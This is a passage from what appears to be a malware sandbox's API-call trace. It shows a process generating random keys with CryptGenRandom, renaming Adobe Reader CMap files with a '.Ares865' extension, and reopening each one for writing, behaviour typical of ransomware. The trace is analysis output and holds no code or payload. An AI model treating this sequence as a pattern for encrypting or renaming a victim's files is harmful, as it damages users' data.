dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=301722) returned 1 [0161.615] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.616] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.616] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.643] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.644] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.644] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.648] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-0" | out: lpString1="Adobe-Korea1-0") returned="Adobe-Korea1-0" [0161.648] lstrlenW (lpString="Adobe-Korea1-0") returned 14 [0161.648] lstrlenW (lpString="Ares865") returned 7 [0161.648] lstrcmpiW (lpString1="orea1-0", lpString2="Ares865") returned 1 [0161.649] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0.Ares865") returned 77 [0161.649] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-0"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-0.ares865"), dwFlags=0x1) returned 1 [0161.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.652] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3618) returned 1 [0161.653] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.653] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.653] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.657] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.657] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.658] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.658] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-1" | out: lpString1="Adobe-Korea1-1") returned="Adobe-Korea1-1" [0161.658] lstrlenW (lpString="Adobe-Korea1-1") returned 14 [0161.658] lstrlenW (lpString="Ares865") returned 7 [0161.658] lstrcmpiW (lpString1="orea1-1", lpString2="Ares865") returned 1 [0161.658] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1.Ares865") returned 77 [0161.659] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-1"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-1.ares865"), dwFlags=0x1) returned 1 [0161.661] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.661] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4309) returned 1 [0161.661] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.662] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.662] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.665] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.665] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.665] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.666] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-2" | out: lpString1="Adobe-Korea1-2") returned="Adobe-Korea1-2" [0161.666] lstrlenW (lpString="Adobe-Korea1-2") returned 14 [0161.666] lstrlenW (lpString="Ares865") returned 7 [0161.666] lstrcmpiW (lpString1="orea1-2", lpString2="Ares865") returned 1 [0161.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2.Ares865") returned 77 [0161.666] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-2.ares865"), dwFlags=0x1) returned 1 [0161.669] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.669] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4308) returned 1 [0161.669] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.670] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.670] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.673] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.674] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.675] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-H-CID" | out: lpString1="Adobe-Korea1-H-CID") returned="Adobe-Korea1-H-CID" [0161.675] lstrlenW (lpString="Adobe-Korea1-H-CID") returned 18 [0161.675] lstrlenW (lpString="Ares865") returned 7 [0161.675] lstrcmpiW (lpString1="1-H-CID", lpString2="Ares865") returned -1 [0161.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID.Ares865") returned 81 [0161.675] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-cid"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-cid.ares865"), dwFlags=0x1) returned 1 [0161.678] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-cid.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.678] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1642) returned 1 [0161.679] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.679] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.679] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.682] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.682] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.682] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.683] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-H-Host" | out: lpString1="Adobe-Korea1-H-Host") returned="Adobe-Korea1-H-Host" [0161.683] lstrlenW (lpString="Adobe-Korea1-H-Host") returned 19 [0161.683] lstrlenW (lpString="Ares865") returned 7 [0161.683] lstrcmpiW (lpString1="-H-Host", lpString2="Ares865") returned 1 [0161.683] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host.Ares865") returned 82 [0161.683] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-host"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-host.ares865"), dwFlags=0x1) returned 1 [0161.687] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-host.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.687] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16064) returned 1 [0161.688] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.688] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.688] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.691] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.692] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-H-Mac" | out: lpString1="Adobe-Korea1-H-Mac") returned="Adobe-Korea1-H-Mac" [0161.692] lstrlenW (lpString="Adobe-Korea1-H-Mac") returned 18 [0161.692] lstrlenW (lpString="Ares865") returned 7 [0161.692] lstrcmpiW (lpString1="1-H-Mac", lpString2="Ares865") returned -1 [0161.693] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac.Ares865") returned 81 [0161.693] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-mac"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-mac.ares865"), dwFlags=0x1) returned 1 [0161.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-mac.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.695] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11427) returned 1 [0161.695] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.696] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.696] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.700] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.701] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.701] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.702] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-KSCms-UHC" | out: lpString1="Adobe-Korea1-KSCms-UHC") returned="Adobe-Korea1-KSCms-UHC" [0161.702] lstrlenW (lpString="Adobe-Korea1-KSCms-UHC") returned 22 [0161.702] lstrlenW (lpString="Ares865") returned 7 [0161.702] lstrcmpiW (lpString1="Cms-UHC", lpString2="Ares865") returned 1 [0161.702] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC.Ares865") returned 85 [0161.702] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscms-uhc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscms-uhc.ares865"), dwFlags=0x1) returned 1 [0161.705] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscms-uhc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15858) returned 1 [0161.705] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.706] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.706] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.709] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.710] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.710] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.710] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-KSCpc-EUC" | out: lpString1="Adobe-Korea1-KSCpc-EUC") returned="Adobe-Korea1-KSCpc-EUC" [0161.710] lstrlenW (lpString="Adobe-Korea1-KSCpc-EUC") returned 22 [0161.710] lstrlenW (lpString="Ares865") returned 7 [0161.711] lstrcmpiW (lpString1="Cpc-EUC", lpString2="Ares865") returned 1 [0161.711] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC.Ares865") returned 85 [0161.711] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscpc-euc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscpc-euc.ares865"), dwFlags=0x1) returned 1 [0161.713] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscpc-euc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.713] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11507) returned 1 [0161.713] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.714] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.714] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.717] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.718] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.718] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.719] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-Korea1-UCS2" | out: lpString1="Adobe-Korea1-UCS2") returned="Adobe-Korea1-UCS2" [0161.719] lstrlenW (lpString="Adobe-Korea1-UCS2") returned 17 [0161.719] lstrlenW (lpString="Ares865") returned 7 [0161.719] lstrcmpiW (lpString1="a1-UCS2", lpString2="Ares865") returned -1 [0161.719] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2.Ares865") returned 80 [0161.719] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.721] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.721] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=154586) returned 1 [0161.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.722] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.722] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.734] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.734] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.734] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.737] lstrcpyW (in: lpString1=0x2cce46e, lpString2="B5pc-H" | out: lpString1="B5pc-H") returned="B5pc-H" [0161.737] lstrlenW (lpString="B5pc-H") returned 6 [0161.737] lstrlenW (lpString="Ares865") returned 7 [0161.737] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H.Ares865") returned 69 [0161.737] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-h.ares865"), dwFlags=0x1) returned 1 [0161.739] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.740] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7953) returned 1 [0161.740] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.741] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.741] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.743] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.744] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.744] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.745] lstrcpyW (in: lpString1=0x2cce46e, lpString2="B5pc-UCS2" | out: lpString1="B5pc-UCS2") returned="B5pc-UCS2" [0161.745] lstrlenW (lpString="B5pc-UCS2") returned 9 [0161.745] lstrlenW (lpString="Ares865") returned 7 [0161.745] lstrcmpiW (lpString1="pc-UCS2", lpString2="Ares865") returned 1 [0161.745] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2.Ares865") returned 72 [0161.745] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.747] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.747] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1225) returned 1 [0161.747] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.748] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.748] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.756] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.757] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.757] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.757] lstrcpyW (in: lpString1=0x2cce46e, lpString2="B5pc-UCS2C" | out: lpString1="B5pc-UCS2C") returned="B5pc-UCS2C" [0161.757] lstrlenW (lpString="B5pc-UCS2C") returned 10 [0161.758] lstrlenW (lpString="Ares865") returned 7 [0161.758] lstrcmpiW (lpString1="c-UCS2C", lpString2="Ares865") returned 1 [0161.758] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program 